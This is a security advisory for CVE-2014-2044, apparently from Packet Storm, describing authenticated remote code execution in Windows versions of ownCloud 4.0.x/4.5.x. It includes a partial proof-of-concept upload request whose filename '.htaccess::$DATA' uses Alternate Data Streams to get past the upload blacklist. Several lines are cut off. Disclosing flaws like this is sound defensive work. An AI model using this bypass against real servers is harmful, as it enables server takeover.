ownCloud 4.0.x / 4.5.x Remote Code Execution

Type packetstorm
Reporter Alejo Murillo Moya
Modified 2014-03-06T00:00:00


                                            `Vulnerability title: Remote Code Execution in ownCloud  
CVE: CVE-2014-2044  
Vendor: ownCloud  
Product: ownCloud  
Affected version: 4.0.x & 4.5.x  
Fixed version: 5.0  
Reported by: Alejo Murillo Moya  
A remote code execution has been found and confirmed within ownCloud as  
an authenticated user. A successful attack could allow an authenticated  
attacker to execute PHP code, which could lead to a full compromise of  
the server and associated infrastructure. Please note that only the  
Windows versions of ownCloud are affected and that valid credentials are  
It is possible to create a custom .htaccess into the user's folder on  
Windows version of the application, which will enable PHP execution on  
the folder. This vulnerability exists because it is possible to bypass  
the internal blacklists using Windows ADS (Alternate Data Streams).  
Proof Of Concept:  
POST /owncloud_5.0.14a/owncloud/?app=files&getfile=ajax%2Fupload.php HTTP/1.1  
Content-Type: multipart/form-data; boundary=---------------------------21191376031994875607185408411  
Requesttoken: None  
Content-Disposition: form-data; name="MAX_FILE_SIZE"   
Content-Disposition: form-data; name="requesttoken"   
Content-Disposition: form-data; name="dir"   
Content-Disposition: form-data; name="files[]"; filename=".htaccess::$DATA"   
Content-Type: text/plain  
Further details at:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.